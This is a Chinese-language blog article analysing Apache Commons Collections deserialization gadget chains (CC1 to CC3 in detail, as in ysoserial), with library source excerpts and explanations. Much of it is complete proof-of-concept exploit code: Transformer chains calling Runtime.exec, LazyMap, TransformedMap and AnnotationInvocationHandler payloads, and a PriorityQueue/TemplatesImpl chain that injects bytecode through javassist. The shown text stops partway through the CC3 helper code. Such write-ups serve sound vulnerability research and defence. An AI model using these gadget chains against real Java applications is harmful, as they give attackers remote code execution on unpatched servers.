2022年1月6日01:45:51评论134 views字数 50771阅读169分14秒阅读模式

Apache Commons Collections 是一个扩展了Java标准库里的Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件，Commons Collections被广泛应用于各种Java应用的开发。

CommonsCollections1
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：AnnotationInvocationHandler
CommonsCollections2
- 命令执行载体：org.apache.xalan.xsltc.trax.TemplatesImpl
- 反序列化载体：PriorityQueue
- PriorityQueue.readObject()执行排序时，TransformingComparator.compare()会调用InvokerTransformer.transform()转换元素，进而获取第一个元素TemplatesImpl的newTransformer()并调用，最终导致命令执行
CommonsCollections3
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：AnnotationInvocationHandler
- 除Transformer数组元素组成不同外，与CommonsCollections1基本一致
CommonsCollections4
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：PriorityQueue
- PriorityQueue.readObject()执行排序时，TransformingComparator.compare()会调用ChainedTransformer.transform()转换元素，进而遍历执行Transformer数组中的每个元素，最终导致命令执行
CommonsCollections5
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：BadAttributeValueExpException
- BadAttributeValueExpException.readObject()当System.getSecurityManager()为null时，会调用TiedMapEntry.toString()，它在getValue()时会通过LazyMap.get()取值，最终导致命令执行
CommonsCollections6
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：HashSet
- HashSet.readObject()反序列化各元素后，会调用HashMap.put()将结果放进去，而它通过TiedMapEntry.hashCode()计算hash时，会调用getValue()触发LazyMap.get()导致命令执行
CommonsCollections7
- 命令执行载体：org.apache.commons.collections.functors.ChainedTransformer
- 反序列化载体：Hashtable
- Hashtable#readObject反序列化各元素后，会调用reconstitutionPut，后面利用链中在比较hash值的时候用到了hashcode相等的两个字符串 yy 和 zZ。最后后AbstractMap#equals 触发LazyMap.get()导致命令执行

java -jar ysoserial.jar info

CommonsCollections1  @frohoff                               commons-collections:3.1                                                                                                     
CommonsCollections10                                        commons-collections:3.2.1                                                                                                   
CommonsCollections2  @frohoff                               commons-collections4:4.0                                                                                                    
CommonsCollections3  @frohoff                               commons-collections:3.1                                                                                                     
CommonsCollections4  @frohoff                               commons-collections4:4.0                                                                                                    
CommonsCollections5  @matthias_kaiser, @jasinner            commons-collections:3.1                                                                                                     
CommonsCollections6  @matthias_kaiser                       commons-collections:3.1                                                                                                     
CommonsCollections7  @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1                                                                                                     
CommonsCollections8                                         commons-collections4:4.0                                                                                                    
CommonsCollections9                                         commons-collections:3.1

CommonsCollections1

maven

<dependencies>
   <dependency>
       <groupId>commons-collections</groupId>
       <artifactId>commons-collections</artifactId>
       <version>3.1</version>
   </dependency>
 </dependencies>

核心利用链

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import java.lang.Runtime;

public class ComCol1 {
    public static void main(String[] args) {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc",}),
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        transformerChain.transform(null);
    }


}

Commons Coolections的反序列化漏洞利用链，首先定义一个Transformer的数组，Transformer是一个接口，数组里的元素都继承了这个接口。

1
2
3

public interface Transformer {
    Object transform(Object var1);
}

进入数据第一个元素ConstantTransformer类中,该类在实例化时候，会将传入的对象赋值给iConstant属性，实现Transformer接口的transform方法中，返回iConstant指向的对象。

public class ConstantTransformer implements Transformer, Serializable {
    static final long serialVersionUID = 6374440726369055124L;
    public static final Transformer NULL_INSTANCE = new ConstantTransformer((Object)null);
    private final Object iConstant;

    public static Transformer getInstance(Object constantToReturn) {
        return (Transformer)(constantToReturn == null ? NULL_INSTANCE : new ConstantTransformer(constantToReturn));
    }

    public ConstantTransformer(Object constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public Object transform(Object input) {
        return this.iConstant;
    }

    public Object getConstant() {
        return this.iConstant;
    }
}

进入InvokerTransformer类中，transform方法有反射获取方法并调用的操作

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    this.iMethodName = methodName;
    this.iParamTypes = paramTypes;
    this.iArgs = args;
}

public Object transform(Object input) {
    if (input == null) {
        return null;
    } else {
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
            return method.invoke(input, this.iArgs);
        }……

反射如何调用runtime？

import java.lang.reflect.Method;

public class Test {
    public static void main(String[] args) throws Exception {
        Class run = Class.forName("java.lang.Runtime");
        Method getrun = run.getMethod("getRuntime");
        Method exec = run.getMethod("exec",String.class);
        exec.invoke(getrun.invoke(run),"calc");
    }
}

反射调用需要获取类的名字，一般用Class.fotname获取，之后从这个类中使用getMethod获取需要调用的方法，最后用invoke方法调用这个方法。这里以Runtime类为例子，首先获取Runtime类的类名，然后获取getRuntime静态方法，因为Runtime类的构造函数是私有方法，只能用getRuntime方法获取类的实例，之后获取Runtime的exec方法，这个方法是执行命令的方法，也需要获取，exec不是静态方法，在invoke方法中需要传入object，所以，需要先调用getRuntime生成Runtime的对象，getRuntime方法是静态方法，他在调用invoke需要传入的是类名，反射调用时，满足以上条件后就能弹出计算器。

最后看一下ChainedTransformer类，transform方法遍历执行类实例化时传入的数组元素对象的transform，刚好提供了漏洞利用链

public ChainedTransformer(Transformer[] transformers) {
    this.iTransformers = transformers;
}

public Object transform(Object object) {
    for(int i = 0; i < this.iTransformers.length; ++i) {
        object = this.iTransformers[i].transform(object);
    }

    return object;
}

为什么用如下代码更简单一些，这里涉及到一个坑，在反序列化的时候函数中涉及到的对象必须是实现了Serializable接口，但是在这里Runtime.getRuntime()得到的是Runtime对象，然而Runtime对象是没有实现反序列化接口的所以，这里不能这么写。要通过ChainedTransformer 实现最终的执行链。

   Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(java.lang.Runtime.getRuntime()),
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc",}),
    };
    Transformer transformerChain = new ChainedTransformer(transformers);
    transformerChain.transform(null);
}

上面理解了核心利用链，但该如何被调用。

CommonsCollections1 POC 涉及到了两个利用链

TransformedMap
LazyMap （ysoserial 中利用链）

LazyMap 利用链 POC

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class ComColLazyMap1 {
    public static byte[] serialize(final Object obj) throws Exception {
        ByteArrayOutputStream btout = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(btout);
        objOut.writeObject(obj);
        return btout.toByteArray();
    }
    public static Object unserialize(final byte[] serialized) throws Exception {
        ByteArrayInputStream btin = new ByteArrayInputStream(serialized);
        ObjectInputStream objIn = new ObjectInputStream(btin);
        return objIn.readObject();
    }
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc"})
        };
        Transformer transformerChain = new ChainedTransformer(transformers);
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        String classToSerialize = "sun.reflect.annotation.AnnotationInvocationHandler";
        final Constructor<?> constructor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
        constructor.setAccessible(true);
        InvocationHandler secondInvocationHandler = (InvocationHandler) constructor.newInstance(Override.class, lazyMap);

        final Map testMap = new HashMap();

        Map evilMap = (Map) Proxy.newProxyInstance(
                testMap.getClass().getClassLoader(),
                testMap.getClass().getInterfaces(),
                secondInvocationHandler
        );
        final Constructor<?> ctor = Class.forName(classToSerialize).getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        final InvocationHandler handler = (InvocationHandler) ctor.newInstance(Override.class, evilMap);
        byte[] serializeData=serialize(handler);
        unserialize(serializeData);
    }
}

利用链

Gadget chain:
    ObjectInputStream.readObject()
        AnnotationInvocationHandler.readObject()
            Map(Proxy).entrySet()
                AnnotationInvocationHandler.invoke()
                    LazyMap.get()
                        ChainedTransformer.transform()
                            ConstantTransformer.transform()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Class.getMethod()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.getRuntime()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.exec()

Requires:
    commons-collections

Apache-Commons-Collections漏洞分析
进入LazyMap类中，发现在LazyMap的get方法中有一处调用transform方法

public Object get(Object key) {
    if (!super.map.containsKey(key)) {
        Object value = this.factory.transform(key);
        super.map.put(key, value);
        return value;
    } else {
        return super.map.get(key);
    }
}

变量factory从LazyMap的构造方法中，factory为Transformer类型。

public static Map decorate(Map map, Transformer factory) {
        return new LazyMap(map, factory);
    }
    protected LazyMap(Map map, Transformer factory) {
        super(map);
        if (factory == null) {
            throw new IllegalArgumentException("Factory must not be null");
        } else {
            this.factory = factory;
        }
    }

接下来就是如何处罚LazyMap中的get方法，进入AnnotationInvocationHandler中，AnnotationInvocationHandler invoke方法中调用想要的map类的get方法，同时只需要在构造方法处传入LazyMap即可

//sun.reflect.annotation.AnnotationInvocationHandler  
    AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
        this.type = var1;
        this.memberValues = var2;
    }

    public Object invoke(Object var1, Method var2, Object[] var3) {
        String var4 = var2.getName();
        Class[] var5 = var2.getParameterTypes();
        if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {
            return this.equalsImpl(var3[0]);
        } else {
            assert var5.length == 0;

            if (var4.equals("toString")) {
                return this.toStringImpl();
            } else if (var4.equals("hashCode")) {
                return this.hashCodeImpl();
            } else if (var4.equals("annotationType")) {
                return this.type;
            } else {
                Object var6 = this.memberValues.get(var4);
                ……

AnnotationInvocationHandler实现了InvocationHandler接口，可以用 jdk 代理调用。

TransformedMap 利用链 POC

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Annotation;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
//import sun.reflect.annotation.AnnotationInvocationHandler;
import sun.reflect.annotation.AnnotationParser;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;

public class ComColTestTransformedMap1 {
    public static void main(String[] args) throws Exception {
        //此处构建了一个transformers的数组，在其中构建了任意函数执行的核心代码
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc"})
        };
        //将transformers数组存入ChaniedTransformer这个继承类
        Transformer transformerChain = new ChainedTransformer(transformers);
        //创建Map并绑定transformerChina
        Map innerMap = new HashMap();
        innerMap.put("value", "value");
        //给予map数据转化链
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
        //触发漏洞
        Map.Entry onlyElement = (Map.Entry) outerMap.entrySet().iterator().next();
        //outerMap后一串东西，其实就是获取这个map的第一个键值对（value,value）；然后转化成Map.Entry形式，这是map的键值对数据格式
        //onlyElement.setValue("foobar");
        //反射机制调用AnnotationInvocationHandler类的构造函数
        Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor ctor = cl.getDeclaredConstructor(Class.class, Map.class);
        //取消构造函数修饰符限制
        ctor.setAccessible(true);
        //获取AnnotationInvocationHandler类实例
        Object instance = ctor.newInstance(Retention.class, outerMap);
        FileOutputStream f = new FileOutputStream("p.cer");
        ObjectOutputStream out = new ObjectOutputStream(f);
        out.writeObject(instance);
        FileInputStream fi = new FileInputStream("p.cer");
        ObjectInputStream in = new ObjectInputStream(fi);
        in.readObject();
    }
}

进入 TransformedMap 函数

public class TransformedMap extends AbstractInputCheckedMapDecorator implements Serializable {
    private static final long serialVersionUID = 7023152376788900464L;
    protected final Transformer keyTransformer;
    protected final Transformer valueTransformer;

    public static Map decorate(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        return new TransformedMap(map, keyTransformer, valueTransformer);
    }

    protected TransformedMap(Map map, Transformer keyTransformer, Transformer valueTransformer) {
        super(map);
        this.keyTransformer = keyTransformer;
        this.valueTransformer = valueTransformer;
    }

decorate方法是返回一个TransformedMap对象，其中valueTransformer是我们传入的Transformer数组，在TransformedMap类里还有一个很重要的函数

1
2
3

protected Object checkSetValue(Object value) {
    return this.valueTransformer.transform(value);
}

在setValue的时候就会触发这个函数，进入我们之前的利用链，map选择hashmap，因为他继承了反序列化接口，现在还需要一个readobject里面会调用setValue的入口来调用pop链，在jdk 7，这个入口就是sun.reflect.annotation.AnnotationInvocationHandler


  AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {
       this.type = var1;
       this.memberValues = var2;
   }
   
   
private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
       var1.defaultReadObject();
       AnnotationType var2 = null;

       try {
           var2 = AnnotationType.getInstance(this.type);
       } catch (IllegalArgumentException var9) {
           return;
       }

       Map var3 = var2.memberTypes();
       Iterator var4 = this.memberValues.entrySet().iterator();

       while(var4.hasNext()) {
           Entry var5 = (Entry)var4.next();
           String var6 = (String)var5.getKey();
           Class var7 = (Class)var3.get(var6);
           if (var7 != null) {
               Object var8 = var5.getValue();
               if (!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                   var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
               }
           }
       }

   }

CommonsCollections2

maven

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>
<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.25.0-GA</version>
</dependency>

利用链

ObjectInputStream.readObject()
    PriorityQueue.readObject()
        ...
            TransformingComparator.compare()
                InvokerTransformer.transform()
                    Method.invoke()
                        Runtime.exec()

poc1

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class ComCol2 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, new Object[]{"calc"})});

        TransformingComparator comparator = new TransformingComparator(chain);
        PriorityQueue queue = new PriorityQueue(1);

        queue.add(1);
        queue.add(2);

        Field field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        field.setAccessible(true);
        field.set(queue,comparator);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc2"));
            outputStream.writeObject(queue);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc2"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }

    }
}

这个poc延用了cc1的后半段链，直接在最后触发了ChainedTransformer#transform方法导致rce。但是cc2在yso中的poc并不是这个，而是用到了一个新的点TemplatesImpl。

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

public class ComCol2 {
    public static void main(String[] args) throws Exception {
        Constructor constructor = Class.forName("org.apache.commons.collections4.functors.InvokerTransformer").getDeclaredConstructor(String.class);
        constructor.setAccessible(true);
        InvokerTransformer transformer = (InvokerTransformer) constructor.newInstance("newTransformer");
        TransformingComparator comparator = new TransformingComparator(transformer);
        PriorityQueue queue = new PriorityQueue(2);
        // javassist
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("Demo");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        // 进入 defineTransletClasses() 方法需要的条件
        setFieldValue(templates, "_name", "name");
        setFieldValue(templates, "_class", null);
        Object[] queue_array = new Object[]{templates, 1};

        Field queue_field = Class.forName("java.util.PriorityQueue").getDeclaredField("queue");
        queue_field.setAccessible(true);
        queue_field.set(queue, queue_array);

        Field size = Class.forName("java.util.PriorityQueue").getDeclaredField("size");
        size.setAccessible(true);
        size.set(queue, 2);


        Field comparator_field = Class.forName("java.util.PriorityQueue").getDeclaredField("comparator");
        comparator_field.setAccessible(true);
        comparator_field.set(queue, comparator);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(queue);
        oos.close();

        System.out.println(bos);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();

    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null) {
                field = getField(clazz.getSuperclass(), fieldName);
            }
        }
        return field;
    }
}

利用过程

发现PriorityQueue的readObject可以调用构造方法参数中的比较器参数的compare方法
接着发现TransformingComparator比较器可以利用compare方法以及其构造参数transformer调用任意对象的任意方法
又因为利用的是CommonsCollections4，所以之前的命令执行链不能使用，所以寻找了个新的命令执行点，只需调用该对象的newTransformer方法即可触发
新的命令执行点包含对Java字节码修改、加载、创建对象、反射等操作，分析起来也挺有意思

分析过程：
javassist 带来的攻击面在于 Java 进行实例化对象的时候会调用 static 代码块

public class Jdemo {
    public static void main(String[] args) throws IOException, CannotCompileException, NotFoundException {
        ClassPool pool = ClassPool.getDefault();
        CtClass cc = pool.makeClass("TestDemo");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);
        cc.writeFile();
    }
}

生成

public class TestDemo {
    static {
        Runtime.getRuntime().exec("calc");
    }

    public TestDemo() {
    }
}

TemplatesImpl类中存在加载字节码并创建实例的函数。

进入 TemplatesImpl，TemplatesImpl#newTransformer 调用了 getTransletInstance

public synchronized Transformer newTransformer()
    throws TransformerConfigurationException
{
    TransformerImpl transformer;

    transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
        _indentNumber, _tfactory);

    if (_uriResolver != null) {
        transformer.setURIResolver(_uriResolver);
    }

    if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
        transformer.setSecureProcessing(true);
    }
    return transformer;
}

进入 getTransletInstance 方法中,如果 _name 不为null的值，_class 设置为 null，这样会调用 defineTransletClasses。

private Translet getTransletInstance()
    throws TransformerConfigurationException {
    try {
        if (_name == null) return null;

        if (_class == null) defineTransletClasses();

        // The translet needs to keep a reference to all its auxiliary
        // class to prevent the GC from collecting them
        AbstractTranslet translet = (AbstractTranslet)
                _class[_transletIndex].getConstructor().newInstance();
        translet.postInitialization();
        translet.setTemplates(this);
        translet.setOverrideDefaultParser(_overrideDefaultParser);
        translet.setAllowedProtocols(_accessExternalStylesheet);
        if (_auxClasses != null) {
            translet.setAuxiliaryClasses(_auxClasses);
        }

        return translet;
    }
    catch (InstantiationException | IllegalAccessException |
            NoSuchMethodException | InvocationTargetException e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString(), e);
    }
}

跟进 defineTransletClases，注意几个问题

_class[i] = loader.defineClass(_bytecodes[i]); 对 byte 进行了还原

需要设置父类为 AbstractTranslet ，默认状态下_transletIndex 的值为 -1，如果进入这个 if 比较后，会给_transletIndex附值至少为 0，不然会抛出异常。这里我们也不能通过反射的方式来设置_transletIndex的值，因为还是会进入到_auxClasses方法中，此方法会报出错误，无法正常的序列化。

private void defineTransletClasses()
    throws TransformerConfigurationException {

    if (_bytecodes == null) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
        throw new TransformerConfigurationException(err.toString());
    }

    TransletClassLoader loader = (TransletClassLoader)
        AccessController.doPrivileged(new PrivilegedAction() {
            public Object run() {
                return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
            }
        });

    try {
        final int classCount = _bytecodes.length;
        _class = new Class[classCount];

        if (classCount > 1) {
            _auxClasses = new HashMap<>();
        }

        for (int i = 0; i < classCount; i++) {
            _class[i] = loader.defineClass(_bytecodes[i]);
            final Class superClass = _class[i].getSuperclass();

            // Check if this is the main class
            if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                _transletIndex = i;
            }
            else {
                _auxClasses.put(_class[i].getName(), _class[i]);
            }
        }

        if (_transletIndex < 0) {
            ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
            throw new TransformerConfigurationException(err.toString());
        }
    }
    catch (ClassFormatError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
    catch (LinkageError e) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
        throw new TransformerConfigurationException(err.toString());
    }
}

回到 TemplatesImpl#getTransletInstance 中，这里进行了实例化，也就是这里会调用我们 static 代码块的代码

1 2	AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].getConstructor().newInstance();

沿用之前 CC1 的思路，目前的核心目的是寻找调用 ChainedTransformer 的 transform 的类

看一下 TransformingComparator#compare ,在上面构造函数实例化对象的时候给 this.transformer 附值为传入的 transformer，这里直接调用 transform 方法，符合我们的构造条件

public TransformingComparator(Transformer<? super I, ? extends O> transformer, Comparator<O> decorated) {
    this.decorated = decorated;
    this.transformer = transformer;
}

public int compare(I obj1, I obj2) {
    O value1 = this.transformer.transform(obj1);
    O value2 = this.transformer.transform(obj2);
    return this.decorated.compare(value1, value2);
}

后续寻找使用这个链的方法，利用链比较复杂，切换到正向PriorityQueue#readObject ，调用了 heapify 方法

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    // Read in size, and any hidden stuff
    s.defaultReadObject();

    // Read in (and discard) array length
    s.readInt();

    SharedSecrets.getJavaOISAccess().checkArray(s, Object[].class, size);
    queue = new Object[size];

    // Read in all elements.
    for (int i = 0; i < size; i++)
        queue[i] = s.readObject();

    // Elements are guaranteed to be in "proper order", but the
    // spec has never explained what that might be.
    heapify();
}

PriorityQueue#heapify 里调用了 siftDown ，但是这里有个条件就是要满足 int i = (size >>> 1) - 1; i >= 0,size至少为2

private void heapify() {
    for (int i = (size >>> 1) - 1; i >= 0; i--)
        siftDown(i, (E) queue[i]);
}

看一下 PriorityQueue#siftDown

    if (comparator != null)
        siftDownUsingComparator(k, x);
    else
        siftDownComparable(k, x);
}

随后用到PriorityQueue#siftDownUsingComparator

private void siftDownUsingComparator(int k, E x) {
    int half = size >>> 1;
    while (k < half) {
        int child = (k << 1) + 1;
        Object c = queue[child];
        int right = child + 1;
        if (right < size &&
            comparator.compare((E) c, (E) queue[right]) > 0)
            c = queue[child = right];
        if (comparator.compare(x, (E) c) <= 0)
            break;
        queue[k] = c;
        k = child;
    }
    queue[k] = x;
}

最重要的参数就是 comparator,可控即可RCE.
接下来我们的任务是如何调用 TemplatesImpl#newTransformer 以及如何与readObject 结合

回顾 InvokerTransformer，调用其 transform 方法，如果可控 transform 方法中参数，以及 this.iMethodName 即可调用任意类的任意方法

private InvokerTransformer(String methodName) {
    this.iMethodName = methodName;
    this.iParamTypes = null;
    this.iArgs = null;
}

public O transform(Object input) {
    if (input == null) {
        return null;
    } else {
        try {
            Class<?> cls = input.getClass();
            Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
            return method.invoke(input, this.iArgs);

CommonsCollections3

cc3更像是cc1+cc2的结合体

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;


public class ComCol3 {

    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("TestDemo");
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        cc.makeClassInitializer().insertBefore(cmd);
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        byte[] classBytes = cc.toBytecode();
        byte[][] targetByteCodes = new byte[][]{classBytes};
        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setFieldValue(templates, "_bytecodes", targetByteCodes);
        setFieldValue(templates, "_name", "TestDemo");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        Transformer[] realPoc = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})};
        ChainedTransformer fakeChain = new ChainedTransformer(new Transformer[]{ new ConstantTransformer("random")});

        Map innerMap = new HashMap();
        Class clz = Class.forName("org.apache.commons.collections.map.LazyMap");
        Constructor construct = clz.getDeclaredConstructor(Map.class, Transformer.class);
        construct.setAccessible(true);
        LazyMap mapDemo = (LazyMap) construct.newInstance(innerMap, fakeChain);
        Constructor handler_construct = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        handler_construct.setAccessible(true);
        InvocationHandler map_handler = (InvocationHandler) handler_construct.newInstance(Override.class, mapDemo);
        Map proxy_map = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Map.class}, map_handler);
        Constructor AnnotationInvocationHandler_Construct = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        AnnotationInvocationHandler_Construct.setAccessible(true);
        InvocationHandler handler = (InvocationHandler)AnnotationInvocationHandler_Construct.newInstance(Override.class, proxy_map);

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(fakeChain, realPoc);

        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(handler);
        oos.close();

        System.out.println(bos);
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()));
        ois.readObject();
    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
